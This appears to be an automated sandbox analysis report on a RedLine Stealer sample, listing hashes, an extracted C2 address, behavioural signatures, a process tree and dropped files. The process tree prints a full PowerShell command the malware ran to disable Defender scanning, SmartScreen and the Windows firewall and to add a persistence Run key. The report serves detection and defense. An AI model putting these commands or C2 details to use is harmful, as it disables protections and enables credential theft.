Overview

overview

10

Static

static

96c2ef023f...c3.exe

windows7_x64

10

96c2ef023f...c3.exe

windows10_x64

10

Analysis

  • max time kernel
    124s
  • max time network
    126s
  • platform
    windows10_x64
  • resource
    win10v20210408
  • submitted
    26-09-2021 23:02

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    96c2ef023febbd4e3773bbb3a59e54c3.exe

  • Size

    417KB

  • MD5

    96c2ef023febbd4e3773bbb3a59e54c3

  • SHA1

    8e20dc3097d3380f1b2c567a05b3a7d8dae713bf

  • SHA256

    770e6bbe4c4f4e7abfbb4a533d28f8e44c5a374aa05dc3c333d7f15594e217e7

  • SHA512

    f5e45c4c6f09c1d1d40832b1611fbff8ba822964cdb40e397254ae143a44f8c822ca7b5dcbdd7a3ddbd5f1b383fd7c1db2233ac9301fbc58f3c75f280abb9370

Score
10/10
redline7w06zphydiscoveryevasioninfostealerpersistencespywarestealersuricata

Malware Config

Extracted

Family

redline

Botnet

7W06ZPHY

C2

188.34.176.164:80

Signatures

  • Modifies security service 2 TTPs 1 IoCs
    evasion
  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

    infostealerredline
  • RedLine Payload 3 IoCs
  • Suspicious use of NtCreateProcessExOtherParentProcess 1 IoCs
  • suricata: ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile

    suricata: ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile

    suricata
  • Downloads MZ/PE file
  • Executes dropped EXE 4 IoCs
  • Modifies Windows Firewall 1 TTPs
    evasion
  • Drops startup file 1 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

    spywarestealer
  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
    spyware
  • Adds Run key to start application 2 TTPs 1 IoCs
    persistence
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

    discovery
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Drops file in System32 directory 1 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Program crash 1 IoCs
  • Modifies data under HKEY_USERS 52 IoCs
  • Modifies system certificate store 2 TTPs 2 IoCs
    evasionspywaretrojan
  • Suspicious behavior: EnumeratesProcesses 59 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of WriteProcessMemory 33 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\96c2ef023febbd4e3773bbb3a59e54c3.exe
    "C:\Users\Admin\AppData\Local\Temp\96c2ef023febbd4e3773bbb3a59e54c3.exe"
    1⤵
    • Suspicious use of SetThreadContext
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of WriteProcessMemory
    PID:1096
    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-Connection www.google.com
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:1268
    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-Connection www.google.com
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:3720
    • C:\Users\Admin\AppData\Local\Temp\96c2ef023febbd4e3773bbb3a59e54c3.exe
      C:\Users\Admin\AppData\Local\Temp\96c2ef023febbd4e3773bbb3a59e54c3.exe
      2⤵
        PID:2916
      • C:\Users\Admin\AppData\Local\Temp\96c2ef023febbd4e3773bbb3a59e54c3.exe
        C:\Users\Admin\AppData\Local\Temp\96c2ef023febbd4e3773bbb3a59e54c3.exe
        2⤵
          PID:2664
        • C:\Users\Admin\AppData\Local\Temp\96c2ef023febbd4e3773bbb3a59e54c3.exe
          C:\Users\Admin\AppData\Local\Temp\96c2ef023febbd4e3773bbb3a59e54c3.exe
          2⤵
            PID:3452
          • C:\Users\Admin\AppData\Local\Temp\96c2ef023febbd4e3773bbb3a59e54c3.exe
            C:\Users\Admin\AppData\Local\Temp\96c2ef023febbd4e3773bbb3a59e54c3.exe
            2⤵
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of WriteProcessMemory
            PID:3832
            • C:\Users\Admin\AppData\Local\Temp\rcn.exe
              "C:\Users\Admin\AppData\Local\Temp\rcn.exe"
              3⤵
              • Executes dropped EXE
              • Drops startup file
              • Modifies system certificate store
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of WriteProcessMemory
              PID:2092
              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" C:\ProgramData\UpSys.exe /SW:0 powershell.exe $(Add-MpPreference -ExclusionPath C:\); $(cd HKLM:\); $(New-ItemProperty –Path $HKLM\SOFTWARE\Policies\Microsoft\Windows\System –Name EnableSmartScreen -PropertyType DWord -Value 0); $(Set-ItemProperty -Path $HKLM\SYSTEM\CurrentControlSet\Services\mpssvc -Name Start -Value 4); $(netsh advfirewall set allprofiles state off); $(Get-Acl C:\ProgramData\Microsoft\Windows\SystemData | Set-Acl C:\ProgramData\MicrosoftNetwork); $(New-ItemProperty –Path $HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run –Name WinNet -PropertyType String -Value C:\ProgramData\MicrosoftNetwork\System.exe); $(New-Item -Path C:\ProgramData -Name check.txt -ItemType file -Value 1); $(exit)
                4⤵
                • Modifies security service
                • Adds Run key to start application
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of WriteProcessMemory
                PID:2064
                • C:\ProgramData\UpSys.exe
                  "C:\ProgramData\UpSys.exe" /SW:0 powershell.exe
                  5⤵
                  • Executes dropped EXE
                  • Suspicious behavior: EnumeratesProcesses
                  PID:3540
                  • C:\ProgramData\UpSys.exe
                    "C:\ProgramData\UpSys.exe" /SW:0 powershell.exe
                    6⤵
                    • Executes dropped EXE
                    • Suspicious behavior: EnumeratesProcesses
                    PID:3000
                    • C:\ProgramData\UpSys.exe
                      "C:\ProgramData\UpSys.exe" /TI/ /SW:0 powershell.exe
                      7⤵
                      • Executes dropped EXE
                      • Modifies data under HKEY_USERS
                      • Suspicious use of WriteProcessMemory
                      PID:1632
                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
                        8⤵
                        • Drops file in System32 directory
                        • Modifies data under HKEY_USERS
                        • Suspicious behavior: EnumeratesProcesses
                        PID:804
                • C:\Windows\system32\netsh.exe
                  "C:\Windows\system32\netsh.exe" advfirewall set allprofiles state off
                  5⤵
                    PID:2216
                • C:\Windows\system32\WerFault.exe
                  C:\Windows\system32\WerFault.exe -u -p 2092 -s 1348
                  4⤵
                  • Suspicious use of NtCreateProcessExOtherParentProcess
                  • Program crash
                  • Suspicious behavior: EnumeratesProcesses
                  PID:4028

          Network

          MITRE ATT&CK Enterprise v6

          Replay Monitor

          Loading Replay Monitor...

          Downloads

          • C:\ProgramData\MicrosoftNetwork\System.exe
            MD5

            cfadb3a07eb0470aeeec9fa3dbb3ad67

            SHA1

            37d6410c23e9ca02bc7ed3c75743b3295dd19712

            SHA256

            1fa432e601026a3a0f2b2b86f95365991af5b8dcb3233369c5f7828409e5ed56

            SHA512

            713804a6dc24e0f64d814a043d682b8455685a818fad2cc875b768ad84287450da2d1373664ea69dced75689605cbf61dccbc2247709afdfb0ffa49a6961498a

            Download Submit

          • C:\ProgramData\UpSys.exe
            MD5

            efe5769e37ba37cf4607cb9918639932

            SHA1

            f24ca204af2237a714e8b41d54043da7bbe5393b

            SHA256

            5f9dfd9557cf3ca96a4c7f190fc598c10f8871b1313112c9aea45dc8443017a2

            SHA512

            33794a567c3e16582da3c2ac8253b3e61df19c255985277c5a63a84a673ac64899e34e3b1ebb79e027f13d66a0b8800884cdd4d646c7a0abe7967b6316639cf1

            Download Submit

          • C:\ProgramData\UpSys.exe
            MD5

            efe5769e37ba37cf4607cb9918639932

            SHA1

            f24ca204af2237a714e8b41d54043da7bbe5393b

            SHA256

            5f9dfd9557cf3ca96a4c7f190fc598c10f8871b1313112c9aea45dc8443017a2

            SHA512

            33794a567c3e16582da3c2ac8253b3e61df19c255985277c5a63a84a673ac64899e34e3b1ebb79e027f13d66a0b8800884cdd4d646c7a0abe7967b6316639cf1

            Download Submit

          • C:\ProgramData\UpSys.exe
            MD5

            efe5769e37ba37cf4607cb9918639932

            SHA1

            f24ca204af2237a714e8b41d54043da7bbe5393b

            SHA256

            5f9dfd9557cf3ca96a4c7f190fc598c10f8871b1313112c9aea45dc8443017a2

            SHA512

            33794a567c3e16582da3c2ac8253b3e61df19c255985277c5a63a84a673ac64899e34e3b1ebb79e027f13d66a0b8800884cdd4d646c7a0abe7967b6316639cf1

            Download Submit

          • C:\ProgramData\UpSys.exe
            MD5

            efe5769e37ba37cf4607cb9918639932

            SHA1

            f24ca204af2237a714e8b41d54043da7bbe5393b

            SHA256

            5f9dfd9557cf3ca96a4c7f190fc598c10f8871b1313112c9aea45dc8443017a2

            SHA512

            33794a567c3e16582da3c2ac8253b3e61df19c255985277c5a63a84a673ac64899e34e3b1ebb79e027f13d66a0b8800884cdd4d646c7a0abe7967b6316639cf1

            Download Submit

          • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\96c2ef023febbd4e3773bbb3a59e54c3.exe.log
            MD5

            377926f80239dae91115ba6b0834d596

            SHA1

            fe1c81f4b1f0ec6aa4534f4a9d988138b78db112

            SHA256

            d8493b667906732f79d5670c5697e5ffe8ccbd7040be4784af8ea109c1b5ba1b

            SHA512

            ad5d3c5d1d557ac27cbcba4d1ba97aa10b393cb88a8f2e36a6027db281c08dcbb0cfd0cd3b2b5198f7cc0513003074ab0878bab110621a408f3c6ca112e8291e

            Download Submit

          • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log
            MD5

            e71a0a7e48b10bde0a9c54387762f33e

            SHA1

            fed75947f1163b00096e24a46e67d9c21e7eeebd

            SHA256

            83d7be67d0eb544d655cc8e8eb687c26f772d6a40ebf8394e5c12b248976a2de

            SHA512

            394c25daef6143de894505189b1edcdffb82fd6ab9de1c9e43865fb790803ff5c384debfe16236d4a9d95a78d3eea548d3cef332ed5a6881ac9c50d252c3c34a

            Download Submit

          • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
            MD5

            78bdb7f359f9a2427667da82810347fe

            SHA1

            b3af00ec40d32c8af9fc0e2edf3577ff759c3aa8

            SHA256

            5ebaf635046e960aa8a0da8026a89476a12dfd4a87b79dcb834149c7879a0395

            SHA512

            597ad8c5cda04d90c560a1fe3770c283d5c8b410f514b6933baec3e7a3c1391214558ab66097f68f2deba1e53c2ea430f0ff38fb30de10f44c1928567856e09d

            Download Submit

          • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
            MD5

            21898aa4fdaf14c28a8bef18a226243b

            SHA1

            55842ecf4f274b525b7f0a0c308ba8a32f5bde4f

            SHA256

            92a6dcbc5a3592de046f829c32ed6795cabb1cc706de21a1f2505260714e3dd7

            SHA512

            ecd778933dd23b2392f927eb7f018e4a794a8c26e187b9405b8e47d9351cb0cc06029110a06846240736bd3f22f9a5ddabde8def70e3f7fb0fc2be869f1bc26f

            Download Submit

          • C:\Users\Admin\AppData\Local\Temp\rcn.exe
            MD5

            cfadb3a07eb0470aeeec9fa3dbb3ad67

            SHA1

            37d6410c23e9ca02bc7ed3c75743b3295dd19712

            SHA256

            1fa432e601026a3a0f2b2b86f95365991af5b8dcb3233369c5f7828409e5ed56

            SHA512

            713804a6dc24e0f64d814a043d682b8455685a818fad2cc875b768ad84287450da2d1373664ea69dced75689605cbf61dccbc2247709afdfb0ffa49a6961498a

            Download Submit

          • C:\Users\Admin\AppData\Local\Temp\rcn.exe
            MD5

            cfadb3a07eb0470aeeec9fa3dbb3ad67

            SHA1

            37d6410c23e9ca02bc7ed3c75743b3295dd19712

            SHA256

            1fa432e601026a3a0f2b2b86f95365991af5b8dcb3233369c5f7828409e5ed56

            SHA512

            713804a6dc24e0f64d814a043d682b8455685a818fad2cc875b768ad84287450da2d1373664ea69dced75689605cbf61dccbc2247709afdfb0ffa49a6961498a

            Download Submit

          • memory/804-440-0x0000023850DC0000-0x0000023850DC1000-memory.dmp

            Filesize

            4KB

            Download

          • memory/804-414-0x0000000000000000-mapping.dmp

            Download

          • memory/804-423-0x000002384E993000-0x000002384E995000-memory.dmp

            Filesize

            8KB

            Download

          • memory/804-421-0x000002384E990000-0x000002384E992000-memory.dmp

            Filesize

            8KB

            Download

          • memory/1096-320-0x0000000005200000-0x0000000005201000-memory.dmp

            Filesize

            4KB

            Download

          • memory/1096-114-0x0000000000790000-0x0000000000791000-memory.dmp

            Filesize

            4KB

            Download

          • memory/1096-310-0x00000000052A0000-0x00000000052B9000-memory.dmp

            Filesize

            100KB

            Download

          • memory/1096-309-0x0000000002970000-0x00000000029A2000-memory.dmp

            Filesize

            200KB

            Download

          • memory/1096-116-0x00000000050A0000-0x00000000050A1000-memory.dmp

            Filesize

            4KB

            Download

          • memory/1268-126-0x00000000080B0000-0x00000000080B1000-memory.dmp

            Filesize

            4KB

            Download

          • memory/1268-146-0x000000000A800000-0x000000000A801000-memory.dmp

            Filesize

            4KB

            Download

          • memory/1268-141-0x0000000007203000-0x0000000007204000-memory.dmp

            Filesize

            4KB

            Download

          • memory/1268-138-0x0000000009C80000-0x0000000009C81000-memory.dmp

            Filesize

            4KB

            Download

          • memory/1268-137-0x0000000009670000-0x0000000009671000-memory.dmp

            Filesize

            4KB

            Download

          • memory/1268-136-0x00000000095E0000-0x00000000095E1000-memory.dmp

            Filesize

            4KB

            Download

          • memory/1268-135-0x00000000096E0000-0x00000000096E1000-memory.dmp

            Filesize

            4KB

            Download

          • memory/1268-130-0x0000000008910000-0x0000000008911000-memory.dmp

            Filesize

            4KB

            Download

          • memory/1268-129-0x0000000008A80000-0x0000000008A81000-memory.dmp

            Filesize

            4KB

            Download

          • memory/1268-128-0x0000000008610000-0x0000000008611000-memory.dmp

            Filesize

            4KB

            Download

          • memory/1268-127-0x0000000008220000-0x0000000008221000-memory.dmp

            Filesize

            4KB

            Download

          • memory/1268-125-0x0000000007F60000-0x0000000007F61000-memory.dmp

            Filesize

            4KB

            Download

          • memory/1268-124-0x0000000007770000-0x0000000007771000-memory.dmp

            Filesize

            4KB

            Download

          • memory/1268-123-0x0000000007202000-0x0000000007203000-memory.dmp

            Filesize

            4KB

            Download

          • memory/1268-122-0x0000000007200000-0x0000000007201000-memory.dmp

            Filesize

            4KB

            Download

          • memory/1268-121-0x0000000007840000-0x0000000007841000-memory.dmp

            Filesize

            4KB

            Download

          • memory/1268-120-0x0000000007150000-0x0000000007151000-memory.dmp

            Filesize

            4KB

            Download

          • memory/1268-117-0x0000000000000000-mapping.dmp

            Download

          • memory/2064-345-0x00000207F3FE0000-0x00000207F3FE2000-memory.dmp

            Filesize

            8KB

            Download

          • memory/2064-338-0x0000000000000000-mapping.dmp

            Download

          • memory/2064-387-0x00000207F3FE8000-0x00000207F3FE9000-memory.dmp

            Filesize

            4KB

            Download

          • memory/2064-355-0x00000207F3FE6000-0x00000207F3FE8000-memory.dmp

            Filesize

            8KB

            Download

          • memory/2064-352-0x00000207F6240000-0x00000207F6241000-memory.dmp

            Filesize

            4KB

            Download

          • memory/2064-346-0x00000207F3FE3000-0x00000207F3FE5000-memory.dmp

            Filesize

            8KB

            Download

          • memory/2064-344-0x00000207F3F50000-0x00000207F3F51000-memory.dmp

            Filesize

            4KB

            Download

          • memory/2092-334-0x00007FF62E060000-0x00007FF62EB1D000-memory.dmp

            Filesize

            10.7MB

            Download

          • memory/2092-336-0x00007FF8A19C0000-0x00007FF8A19C2000-memory.dmp

            Filesize

            8KB

            Download

          • memory/2092-337-0x00007FF8A19D0000-0x00007FF8A19D2000-memory.dmp

            Filesize

            8KB

            Download

          • memory/2092-335-0x00007FF8A19E0000-0x00007FF8A19E2000-memory.dmp

            Filesize

            8KB

            Download

          • memory/2092-331-0x0000000000000000-mapping.dmp

            Download

          • memory/2216-386-0x0000000000000000-mapping.dmp

            Download

          • memory/3540-379-0x0000000000000000-mapping.dmp

            Download

          • memory/3720-212-0x0000000000000000-mapping.dmp

            Download

          • memory/3720-225-0x00000000073C0000-0x00000000073C1000-memory.dmp

            Filesize

            4KB

            Download

          • memory/3720-226-0x00000000073C2000-0x00000000073C3000-memory.dmp

            Filesize

            4KB

            Download

          • memory/3720-259-0x00000000073C3000-0x00000000073C4000-memory.dmp

            Filesize

            4KB

            Download

          • memory/3832-318-0x0000000005530000-0x0000000005531000-memory.dmp

            Filesize

            4KB

            Download

          • memory/3832-324-0x0000000007470000-0x0000000007471000-memory.dmp

            Filesize

            4KB

            Download

          • memory/3832-317-0x0000000005400000-0x0000000005401000-memory.dmp

            Filesize

            4KB

            Download

          • memory/3832-330-0x0000000007AF0000-0x0000000007AF1000-memory.dmp

            Filesize

            4KB

            Download

          • memory/3832-329-0x0000000007400000-0x0000000007401000-memory.dmp

            Filesize

            4KB

            Download

          • memory/3832-316-0x0000000005960000-0x0000000005961000-memory.dmp

            Filesize

            4KB

            Download

          • memory/3832-312-0x000000000041C5D6-mapping.dmp

            Download

          • memory/3832-311-0x0000000000400000-0x0000000000422000-memory.dmp

            Filesize

            136KB

            Download

          • memory/3832-319-0x00000000054A0000-0x00000000054A1000-memory.dmp

            Filesize

            4KB

            Download

          • memory/3832-323-0x0000000006D70000-0x0000000006D71000-memory.dmp

            Filesize

            4KB

            Download

          • memory/3832-321-0x0000000005350000-0x0000000005956000-memory.dmp

            Filesize

            6.0MB

            Download

          • memory/3832-322-0x00000000054E0000-0x00000000054E1000-memory.dmp

            Filesize

            4KB

            Download